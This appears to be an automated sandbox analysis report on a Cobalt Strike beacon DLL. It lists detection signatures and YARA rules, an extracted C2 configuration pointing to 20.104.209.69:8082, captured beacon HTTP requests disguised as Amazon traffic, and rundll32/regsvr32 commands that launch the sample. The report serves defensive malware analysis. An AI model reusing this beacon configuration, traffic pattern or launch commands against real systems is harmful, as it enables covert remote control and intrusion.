Windows Analysis Report
8082-x64.dll.dll

Overview

General Information

Sample Name: 8082-x64.dll.dll
Analysis ID: 780203
MD5: 43616639411a590f022505998a6f567e
SHA1: 416932059dc3488000b171beeac258fc792d4c71
SHA256: 6a289f491c8d5d789e31e89c73ba06ef6fc075458a1106b7213b29da798f6c03
Tags: 45139105143exeopendir

Detection

CobaltStrike
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Yara detected CobaltStrike
C2 URLs / IPs found in malware configuration
Uses known network protocols on non-standard ports
Machine Learning detection for sample
Yara signature match
Tries to load missing DLLs
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Registers a DLL
Sample execution stops while process was sleeping (likely an evasion)
PE file contains more sections than normal
Program does not show much activity (idle)
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware

AV Detection

Source: 8082-x64.dll.dll Avira: detected
Source: 8082-x64.dll.dll ReversingLabs: Detection: 78%
Source: 8082-x64.dll.dll Virustotal: Detection: 63%
Source: 8082-x64.dll.dll Joe Sandbox ML: detected
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp Malware Configuration Extractor: CobaltStrike
  {
    "BeaconType": ["HTTP"],
    "Port": 8082,
    "SleepTime": 38500,
    "MaxGetSize": 1399607,
    "Jitter": 27,
    "C2Server": "20.104.209.69,/broadcast",
    "HttpPostUri": "/1/events/com.amazon.csm.csa.prod",
    "Malleable_C2_Instructions": ["Remove 1308 bytes from the end", "Remove 1 bytes from the end", "Remove 194 bytes from the beginning", "Base64 decode"],
    "SpawnTo": "16nKFaB/gr/TtjAg2jiqFg==",
    "HttpGet_Verb": "GET",
    "HttpPost_Verb": "POST",
    "HttpPostChunk": 0,
    "Spawnto_x86": "%windir%\\syswow64\\gpupdate.exe",
    "Spawnto_x64": "%windir%\\sysnative\\gpupdate.exe",
    "CryptoScheme": 0,
    "Proxy_Behavior": "Use IE settings",
    "Watermark": 1670873463,
    "bStageCleanup": "True",
    "bCFGCaution": "True",
    "KillDate": 0,
    "bProcInject_StartRWX": "True",
    "bProcInject_UseRWX": "False",
    "bProcInject_MinAllocSize": 16700,
    "ProcInject_PrependAppend_x86": ["kJCQ", "Empty"],
    "ProcInject_PrependAppend_x64": ["kJCQ", "Empty"],
    "ProcInject_Execute": ["ntdll.dll:RtlUserThreadStart", "SetThreadContext", "NtQueueApcThread-s", "kernel32.dll:LoadLibraryA", "CreateRemoteThread", "RtlCreateUserThread"],
    "ProcInject_AllocationMethod": "NtMapViewOfSection",
    "bUsesCookies": "False",
    "HostHeader": ""
  }

Networking

Source: Malware configuration extractor URLs: 20.104.209.69
Source: unknown Network traffic detected: HTTP traffic on port 49699 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49699
Source: unknown Network traffic detected: HTTP traffic on port 49700 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49700
Source: unknown Network traffic detected: HTTP traffic on port 49701 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49701
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 8082 -> 49709
Source: global traffic HTTP traffic detected:
  GET /broadcast HTTP/1.1
  Accept: application/json, text/plain, */*
  Accept-Language: en-US,en;q=0.5
  Origin: https://www.amazon.com
  Referer: https://www.amazon.com
  Sec-Fetch-Dest: empty
  Sec-Fetch-Mode: cors
  Sec-Fetch-Site: cross-site
  Te: trailers
  x-amzn-RequestId: FHpLzZRFDaJcV3Y7qyufQOISTIObeVemP+NmdAYcRRIE3FV/EUpEubshH3rkXVtRwA0H5UqybBKz1PDmJULg1XGljnjPbkoWruec57yIzOL214VyxG9n4/paEbjVA0xB3WsFwgdNY86xsizSKv8fcjdoFgmVx/FrmUZeOA6bHh4=
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: 20.104.209.69:8082
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic HTTP traffic detected:
  POST /1/events/com.amazon.csm.csa.prod HTTP/1.1
  Accept: */*
  Origin: https://www.amazon.com
  x-amz-rid: MzM0ODIwMjEy
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36
  Host: 20.104.209.69:8082
  Content-Length: 14587
  Connection: Keep-Alive
  Cache-Control: no-cache
Source: global traffic TCP traffic: 192.168.2.5:49699 -> 20.104.209.69:8082
Source: Joe Sandbox View ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: Joe Sandbox View IP Address: 20.104.209.69
Source: unknown TCP traffic detected without corresponding DNS query: 20.104.209.69
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/1/events/com.amazon.csm.csa.prod
Source: loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcast
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcast((
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcast2
Source: loaddll64.exe, 00000000.00000003.395924452.00000267603A7000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579245580.00000267603A5000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcast?
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: http://20.104.209.69:8082/broadcastp
Source: loaddll64.exe, 00000000.00000002.579668975.0000026760402000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579895773.00000267605C1000.00000004.00001000.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579889103.0000026760597000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-8
Source: loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com

System Summary

Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Rule for beacon reflective loader Author: unknown
Source: 8082-x64.dll.dll, type: SAMPLE Matched rule: CobaltStrike_Resources_Artifact64_v3_14_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/artifact64{.exe,.dll,svc.exe,svcbig.exe,big.exe,big.dll,.x64.dll,big.x64.dll} and resource/artifactuac(alt)64.exe signature for versions v3.14 through v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = decfcca0018f2cec4a200ea057c804bb357300a67c6393b097d52881527b1c44
Source: 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_Sleeve_BeaconLoader_VA_x64_o_v4_3_v4_4_v4_5_and_v4_6 date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's sleeve/BeaconLoader.VA.x64.o (VirtualAlloc) Versions 4.3 through at least 4.6, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = ac090a0707aa5ccd2c645b523bd23a25999990cf6895fce3bfa3b025e3e8a1c9
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Cobaltbaltstrike_Beacon_x64 author = Avast Threat Intel Team, description = Detects CobaltStrike payloads, reference = https://github.com/avast/ioc
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: CobaltStrike_MZ_Launcher date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike MZ header ReflectiveLoader launcher
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious single byte XORed keyword 'Mozilla/5.0' - it uses yara's XOR modifier and therefore cannot print the XOR key. You can use the CyberChef recipe linked in the reference field to brute force the used key., score = , reference = https://gchq.github.io/CyberChef/#recipe=XOR_Brute_Force(), modified = 2022-05-13
Source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR Matched rule: SUSP_PS1_FromBase64String_Content_Indicator date = 2020-01-25, author = Florian Roth, description = Detects suspicious base64 encoded PowerShell expressions, type = file, reference = https://gist.github.com/Neo23x0/6af876ee72b51676c82a2db8d2cd3639
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR Matched rule: CobaltStrike_Resources_Command_Ps1_v2_5_to_v3_7_and_Resources_Compress_Ps1_v3_8_to_v4_x date = 2022-11-18, author = gssincla@google.com, description = Cobalt Strike's resources/command.ps1 for versions 2.5 to v3.7 and resources/compress.ps1 from v3.8 to v4.x, reference = https://cloud.google.com/blog/products/identity-security/making-cobalt-strike-harder-for-threat-actors-to-abuse, hash = 932dec24b3863584b43caf9bb5d0cfbd7ed1969767d3061a7abdc05d3239ed62
Source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR Matched rule: CobaltStrike_C2_Encoded_XOR_Config_Indicator date = 2021-07-08, author = yara@s3c.za.net, description = Detects CobaltStrike C2 encoded profile configuration
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: 8082-x64.dll.dll Static PE information: Number of sections : 11 > 10
Source: 8082-x64.dll.dll Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\loaddll64.exe Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1
Source: unknown Process created: C:\Windows\System32\loaddll64.exe loaddll64.exe "C:\Users\user\Desktop\8082-x64.dll.dll"
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\cmd.exe cmd.exe /C rundll32.exe "C:\Users\user\Desktop\8082-x64.dll.dll",#1
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\regsvr32.exe regsvr32.exe /s C:\Users\user\Desktop\8082-x64.dll.dll
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllGetClassObject
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllMain
Source: C:\Windows\System32\loaddll64.exe Process created: C:\Windows\System32\rundll32.exe rundll32.exe C:\Users\user\Desktop\8082-x64.dll.dll,DllRegisterServer
Source: C:\Windows\System32\loaddll64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2884:120:WilError_01
Source: classification engine Classification label: mal100.troj.winDLL@14/0@0/1
Source: 8082-x64.dll.dll Static PE information: Image base 0x6bac0000 > 0x60000000
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760595E1A push ecx; ret 0_3_0000026760595E2D
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760596786 push ebx; ret 0_3_0000026760596794
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760596726 push ebx; ret 0_3_0000026760596794
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760595795 push eax; ret 0_3_00000267605957A4
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_00000267605957C3 push eax; ret 0_3_00000267605957A4
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_00000267605978FA push ecx; ret 0_3_0000026760597918
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760594167 push esi; ret 0_3_000002676059416C
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_000002676059625F push ebp; ret 0_3_0000026760596263
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_00000267605972C8 push ebx; ret 0_3_00000267605972E8
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760594AC9 push esp; ret 0_3_0000026760594AD2
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760595AEF push edx; ret 0_3_0000026760595AB8
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_00000267605972EB push esp; ret 0_3_000002676059731C
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760594C00 push esi; ret 0_3_0000026760594C09
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760594480 push edx; ret 0_3_0000026760594498
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760598469 push es; ret 0_3_0000026760598470
Source: C:\Windows\System32\loaddll64.exe Code function: 0_3_0000026760598498 push ebp; ret 0_3_000002676059849F
Source: 8082-x64.dll.dll Static PE information: section name: .xdata

Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\loaddll64.exe TID: 3724 Thread sleep time: -120000s >= -30000s
Source: C:\Windows\System32\loaddll64.exe TID: 5220 Thread sleep time: -32461s >= -30000s
Source: C:\Windows\System32\loaddll64.exe TID: 5220 Thread sleep time: -37737s >= -30000s
Source: C:\Windows\System32\loaddll64.exe TID: 5220 Thread sleep time: -34501s >= -30000s
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: all processes Thread injection, dropped files, key value created, disk infection and DNS query: no activity detected
Source: C:\Windows\System32\loaddll64.exe Process information queried: ProcessInformation
Source: C:\Windows\System32\loaddll64.exe Thread delayed: delay time: 120000
Source: loaddll64.exe, 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.395951899.00000267603C6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWDO=:
Source: loaddll64.exe, 00000000.00000002.579279943.00000267603C6000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000002.579185009.0000026760353000.00000004.00000001.00020000.00000000.sdmp, loaddll64.exe, 00000000.00000003.395951899.00000267603C6000.00000004.00001000.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: C:\Windows\System32\loaddll64.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Remote Access Functionality

Source: Yara match File source: 00000000.00000003.323615011.0000026760590000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll64.exe PID: 3648, type: MEMORYSTR
Source: Yara match File source: 8082-x64.dll.dll, type: SAMPLE